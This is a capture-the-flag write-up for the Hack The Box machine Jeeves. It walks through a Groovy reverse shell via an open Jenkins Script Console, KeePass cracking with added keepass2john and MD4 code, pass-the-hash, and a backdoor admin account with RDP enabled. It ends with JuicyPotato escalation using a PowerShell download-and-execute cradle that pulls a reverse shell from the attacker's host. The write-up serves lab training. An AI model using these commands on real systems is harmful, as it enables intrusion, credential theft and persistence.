Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
We’ll start with a full-port nmap scan: nmap -p- 10.10.10.63
Then we run a version-detection scan against the ports that came back.
Let’s start by enumerating some directories: gobuster dir -u http://10.10.10.63 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
This scan takes a while to run, but once it does we can look at the results:
And nothing. So let’s try enumerating port 50000 as well: gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
And there’s a /askjeeves directory, so let’s navigate to that webpage.
The footer in the bottom right corner shows this is Jenkins 2.87. Clicking around a bit, we find the Manage Jenkins page is reachable without logging in, and under it an option to bring up the Script Console. The Script Console runs arbitrary Groovy on the Jenkins master with the privileges of the account the Jenkins service runs as, so anonymous access to it is effectively remote code execution.
A little bit of Googling “jenkins reverse shell script” brings us to a GitHub page with an example Groovy reverse shell. If we paste it into the Script Console, we should get a shell back to our box.
Replace localhost in the script with the IP of our Kali box, pick a port, start a netcat listener on that port on Kali, and then run the script:
And we’ve got a shell!
We land in the C:\Users\Administrator\.jenkins directory (the Jenkins home), but we can’t move up a level:
So let’s run whoami and see if we can navigate to that user’s directory:
The user flag is in the Desktop of user kohsuke and can be viewed by typing type user.txt when you’re in that directory.
Copying Files from Target to Attacking Machine
If you dig around in the Documents directory, you’ll see a file called CEH.kdbx, a KeePass database.
We’re going to set up our Kali box as an SMB server so we can transfer the KeePass file to our Kali machine and attack it offline. To do this we’ll use impacket-smbserver.
First, on your Kali box, from within your working directory, create a folder to share, in this case one literally named pwd.
Then start the server. The syntax is impacket-smbserver <share name> <share path>, so in our instance: impacket-smbserver Folder pwd
Next, from our Windows shell, map that share to a drive letter: net use s: \\10.10.14.30\Folder (if Windows refuses with a protocol error, restart the server with the -smb2support flag, since recent Windows builds no longer speak SMB1 by default).
Now copy the file over: copy CEH.kdbx s: and it should appear in the pwd folder on your Kali box.
John the Ripper
John ships with a helper, keepass2john, that reads the key-derivation parameters out of the KeePass database header (the seeds, IV, transform rounds and the expected first decrypted block) and writes them as a hash line john can attack: keepass2john CEH.kdbx > CEHtohack
Then we point John the Ripper at it: john CEHtohack -w:/usr/share/wordlists/rockyou.txt (on Kali, rockyou ships compressed as rockyou.txt.gz, so gunzip it first). Once it cracks, john --show CEHtohack prints the recovered password.
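To make it concrete what keepass2john actually pulls out of the file, here is an added Python re-implementation of its KDBX 2.x handling. This is example code written for this page, not the page’s own commands and not John’s source. It builds a constructed, structurally valid KDBX 3.1 header (deterministic pseudo-random seeds and a dummy ciphertext; it is not a real database and no password opens it) and emits the same $keepass$*2*rounds*offset*... line that john consumes. The field order follows the keepass2john output for KeePass 2.x databases; the sample values and the database name CEH are assumptions.

```python
import random
import struct

# KDBX 2.x (KeePass 2) file signature and the outer-header field IDs of the
# KDBX 3.x layout that keepass2john understands.
KDBX_SIG1 = 0x9AA2D903
KDBX_SIG2 = 0xB54BFB67
F_END, F_CIPHER, F_COMPRESSION, F_MASTER_SEED, F_TRANSFORM_SEED = 0, 2, 3, 4, 5
F_TRANSFORM_ROUNDS, F_IV, F_PROTECTED_KEY, F_STREAM_START, F_INNER_RANDOM = 6, 7, 8, 9, 10


def parse_kdbx_header(blob: bytes) -> dict:
    """Walk the plaintext outer header: 12-byte signature/version, then
    TLV fields (1-byte id, 2-byte LE length, data) up to the End field."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", blob, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KeePass 2.x database")
    if major >= 4:
        raise ValueError("KDBX 4 (Argon2, 4-byte lengths) is laid out differently")
    fields, pos = {}, 12
    while True:
        fid, length = struct.unpack_from("<BH", blob, pos)
        pos += 3
        data = blob[pos:pos + length]
        if len(data) != length:
            raise ValueError("truncated header")
        pos += length
        if fid == F_END:
            break
        fields[fid] = data
    # Everything from here on is ciphertext; its first 32 bytes decrypt to
    # F_STREAM_START, which is the check john uses to know a guess is right.
    return {"version": (major, minor), "fields": fields, "data_offset": pos}


def keepass2john(name: str, blob: bytes) -> str:
    """Emit the '$keepass$*2*rounds*dataOffset*masterSeed*transformSeed*iv*
    expectedStartBytes*firstEncryptedBlock' line for KDBX 2.x/3.x files."""
    hdr = parse_kdbx_header(blob)
    f, off = hdr["fields"], hdr["data_offset"]
    rounds = struct.unpack("<Q", f[F_TRANSFORM_ROUNDS])[0]   # AES-KDF iterations
    first_block = blob[off:off + 32]
    if len(first_block) != 32:
        raise ValueError("no encrypted payload after the header")
    return "%s:$keepass$*2*%d*%d*%s*%s*%s*%s*%s" % (
        name, rounds, off, f[F_MASTER_SEED].hex(), f[F_TRANSFORM_SEED].hex(),
        f[F_IV].hex(), f[F_STREAM_START].hex(), first_block.hex())


def _tlv(fid: int, data: bytes) -> bytes:
    return struct.pack("<BH", fid, len(data)) + data


def build_sample_kdbx(rounds: int = 6000) -> bytes:
    """Constructed test input (assumption, not a real file): a structurally
    valid KDBX 3.1 header with deterministic pseudo-random seeds and a dummy
    ciphertext. No password will decrypt it."""
    rng = random.Random(1337)
    rb = lambda n: bytes(rng.getrandbits(8) for _ in range(n))
    hdr = struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 1, 3)          # version 3.1
    hdr += _tlv(F_CIPHER, bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"))  # KeePass AES-256 UUID
    hdr += _tlv(F_COMPRESSION, struct.pack("<I", 1))                 # gzip
    hdr += _tlv(F_MASTER_SEED, rb(32))
    hdr += _tlv(F_TRANSFORM_SEED, rb(32))
    hdr += _tlv(F_TRANSFORM_ROUNDS, struct.pack("<Q", rounds))
    hdr += _tlv(F_IV, rb(16))
    hdr += _tlv(F_PROTECTED_KEY, rb(32))
    hdr += _tlv(F_STREAM_START, rb(32))
    hdr += _tlv(F_INNER_RANDOM, struct.pack("<I", 2))                # Salsa20
    hdr += _tlv(F_END, b"\r\n\r\n")
    return hdr + rb(64)                                              # stand-in ciphertext


if __name__ == "__main__":
    print(keepass2john("CEH", build_sample_kdbx()))
```

Run it and you get a line shaped like the one keepass2john wrote to CEHtohack: the rounds count tells you how expensive each guess is (6000 AES-KDF iterations here), and the data offset (222 for this full header) is simply where the ciphertext starts. Nothing in the line is secret; it is the public salt material john needs to re-derive the key for every candidate password.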
To open the database we need a KeePass client on Kali, so from a terminal: sudo apt-get install keepassx
Launch it from the Application menu, go to Database, Open Database, find the file you transferred over, and enter the password you recovered with John the Ripper.
The entry we’re interested in is the Backup stuff one, so copy its password field. A closer look shows it isn’t a password at all but a Windows LM:NT hash pair: two 32-hex-character halves separated by a colon. The LM half, aad3b435b51404eeaad3b435b51404ee, is the well-known value for an empty (disabled) LM hash, so all the secret material is in the NT half, and that is exactly what a pass-the-hash attack needs: NTLM authentication only requires the hash, not the password.
Passing the Hash
pth-winexe lets us authenticate with the NT hash instead of a password and spawn a command prompt on the target; --system asks it to run the resulting process as SYSTEM: pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
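What exactly is being passed: the NT half of the pair is MD4 over the UTF-16LE encoding of the password, so whoever holds it can authenticate over NTLM exactly as if they held the password. The following added Python example (written for this page, not the author’s code) parses the LM:NT string from the KeePass entry, flags the empty-LM constant, and implements MD4 so the NT hash of a candidate password can be computed and compared offline. The hash pair is the one from the entry above; the candidate password "password" used in the demonstration is an assumption.

```python
import struct

MASK32 = 0xFFFFFFFF
# LM hash of an empty/disabled LM password. If the first half of an "LM:NT" pair
# is this constant, only the NT half carries the secret, which is all PtH needs.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(msg: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is often missing under OpenSSL 3)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = (len(msg) * 8) & 0xFFFFFFFFFFFFFFFF
    # pad: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length
    msg = bytes(msg) + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    R2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    R3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        # each step updates one register and the roles rotate a->d->c->b
        for i in range(16):
            a, b, c, d = d, _rotl((a + F(b, c, d) + X[i]) & MASK32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):
            a, b, c, d = d, _rotl((a + G(b, c, d) + X[R2[i]] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):
            a, b, c, d = d, _rotl((a + H(b, c, d) + X[R3[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK32, (b0 + b) & MASK32, (c0 + c) & MASK32, (d0 + d) & MASK32
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); this is the 'NT' half of an LM:NT pair."""
    return md4(password.encode("utf-16-le")).hex()


def split_lm_nt(pair: str) -> dict:
    """Parse the 'LM:NT' string found in the KeePass entry and sanity-check it."""
    lm, sep, nt = pair.strip().lower().partition(":")
    if not sep or len(lm) != 32 or len(nt) != 32:
        raise ValueError("expected two 32-hex-digit halves separated by ':'")
    int(lm, 16), int(nt, 16)  # raises ValueError on non-hex input
    return {"lm": lm, "nt": nt, "lm_disabled": lm == EMPTY_LM_HASH}


def matches_nt(candidate: str, nt: str) -> bool:
    """Offline check of a password guess against an NT hash."""
    return nt_hash(candidate) == nt.strip().lower()


if __name__ == "__main__":
    # the hash pair from the "Backup stuff" entry; the candidate is an assumption
    info = split_lm_nt("aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00")
    print(info)
    print("guess 'password' matches:", matches_nt("password", info["nt"]))
```

The point for pass-the-hash is that nothing in this derivation is salted or tied to the machine: the NT hash is a fixed function of the password, so the same 32 hex digits authenticate the account anywhere NTLM is accepted. That is also why a password manager entry holding an LM:NT pair is as sensitive as the cleartext.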
Navigating to where the root flag usually lives, C:\Users\Administrator\Desktop, we’re greeted by a file called hm.txt instead of root.txt.
Hack The Box puts root.txt on the Administrator’s Desktop, so the flag is here somewhere; we just have to figure out how to read it. Enter Alternate Data Streams.
Alternate Data Streams
More information regarding Alternate Data Streams can be found here: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
You can list alternate data streams with the /r switch of dir when looking at a Windows directory: dir /r (a stream shows up as filename:streamname:$DATA next to the file that carries it)
The type command can’t open a stream by name, but more can read one through input redirection; type more /? to look at the help contents for this binary in Windows.
Thus, to view the contents of the hidden stream we can type more < hm.txt:root.txt
This portion is largely borrowed from this post, with parts updated for clarification as needed: https://medium.com/@OneebMalik/hack-the-box-jeeves-write-up-f1427462dc19
Let’s back up to where we used pth-winexe to pass the hash and log into the box.
The shell connection I had earlier was pissing me off, and I couldn’t even utilize the backspace. But what if we could establish a remote desktop connection instead? Let’s try that.
We have an administrative hash and we’ve logged in as an admin, so let’s add a user to the machine. The documented form is net user <username> <password> /add; net.exe also accepted the switch first here:
Thus, net user /add bob bobspassword
Then, we add bob to the local Administrators group: net localgroup administrators bob /add
Now we enable Remote Desktop by clearing the fDenyTSConnections value: reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
Then we tell Windows Firewall to let Remote Desktop through: netsh firewall set service remoteadmin enable and then netsh firewall set service remotedesktop enable (the netsh firewall context is deprecated; on Windows 10 the current form is netsh advfirewall firewall set rule group="remote desktop" new enable=Yes)
Now, from a new terminal window in Kali, connect to the Windows box: rdesktop 10.10.10.63 (if rdesktop fails to negotiate, xfreerdp /v:10.10.10.63 /u:bob /p:bobspassword is the usual fallback). Bear in mind that creating an account and opening RDP are loud, persistent changes to the box; fine in a lab, but clean them up afterwards.
Log on with the account you just created. Then use File Explorer to go to the Desktop folder of the Administrator account:
To view the ADS contents, this time I launched PowerShell as an Administrator (find it in the Windows Start Menu, right click, Run as Administrator), then navigated to that location at the prompt.
Microsoft has a post on looking at ADS data from PowerShell: https://docs.microsoft.com/en-us/archive/blogs/askcore/alternate-data-streams-in-ntfs
First, we can check whether the file has any streams attached with: Get-Item .\hm.txt -Stream * (every file has the unnamed :$DATA stream; anything else listed is an alternate data stream)
Now that we see it has data attached to it, we can read the named stream with: Get-Content .\hm.txt -Stream root.txt
Method 2 – Potato Attack
From our shell, we can do whoami /priv to see what privileges our token holds.
We can see here that SeImpersonatePrivilege is enabled. JuicyPotato abuses that privilege: it coerces a privileged COM service (selected by CLSID) into authenticating to a local listener it controls, captures the resulting SYSTEM token, and impersonates it to launch a process of our choosing. So we should be able to use it to spawn a shell back to our Kali machine as SYSTEM. Let’s type systeminfo to see what version of Windows we’re working with, since the technique stops working from Windows 10 1809 / Server 2019 onward.
We’ll start by creating a reverse-shell payload with msfvenom (msfvenom is part of the Metasploit Framework, but the OSCP exam rules permit msfvenom payload generation): msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f exe > shell.exe
And then we’ll download JuicyPotato.exe from its GitHub releases page: wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Next, we’ll navigate to the Desktop of the user: C:\Users\kohsuke\Desktop
We’re going to want to transfer a couple of files to our Windows machine, so from our Kali box let’s spin up Python’s simple HTTP server: python -m SimpleHTTPServer 80 (that is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 80)
I tried using certutil to copy the files over, but it’s missing from the Windows machine. So let’s fall back to impacket-smbserver, this time sharing a folder called smb under the share name smb.
Next, from our Windows shell we connect to that share and copy our files over:
net use s: \\10.10.14.20\smb
copy s:\shell.exe c:\users\kohsuke\Desktop\shell.exe
copy s:\JuicyPotato.exe c:\users\kohsuke\Desktop\JuicyPotato.exe
To use Juicy Potato, we need a CLSID. We can look at some of the Win 10 Pro ones here: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_10_Pro
The first three are related to XBox Live so I’m going to skip them and try the first wuauserv one.
Annnnddddd… it didn’t work, at least not the way it did when I did Arctic. What I noticed was that my shell.exe was getting removed from the target machine quite quickly, probably by antivirus. So we’ll try a different way.
We’re going to use the Invoke-PowerShellTcp.ps1 script from Nishang to get our reverse shell. We’ll stage the script on our Kali box and have a .bat file on the target pull it down and execute it in memory, with the .bat itself launched by JuicyPotato under the SYSTEM token it steals. That way no binary lands on disk for the antivirus to remove.
Start by copying Invoke-PowerShellTcp.ps1 into your working directory, saved as shell.ps1 (the name the .bat will request):
Next, open it in nano and add the following line at the very bottom of the script, so the function is invoked as soon as the file is loaded: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.20 -Port 4444
Next, create a file called shell.bat, open it in nano and add this one line: powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.20:80/shell.ps1')
Then stick the shell.bat into your smb folder because you’re about to copy it to your Windows machine: copy s:\shell.bat c:\users\kohsuke\Desktop\shell.bat
Now, start up Python SimpleHTTPServer so we can grab the shell.ps1 file once our script executes: python -m SimpleHTTPServer 80
Set up your netcat listener on port 4444. Then, from your Windows shell, use JuicyPotato to execute shell.bat: JuicyPotato.exe -l 4444 -p c:\Users\kohsuke\Desktop\shell.bat -t * (here -l is the local port JuicyPotato’s COM listener binds on the target, -p is the program to launch, and -t * lets it try both CreateProcessWithToken and CreateProcessAsUser; with no -c given it uses its default BITS CLSID rather than the wuauserv one picked above, so pass -c {CLSID} if you want a specific one)
And then check your new NetCat window: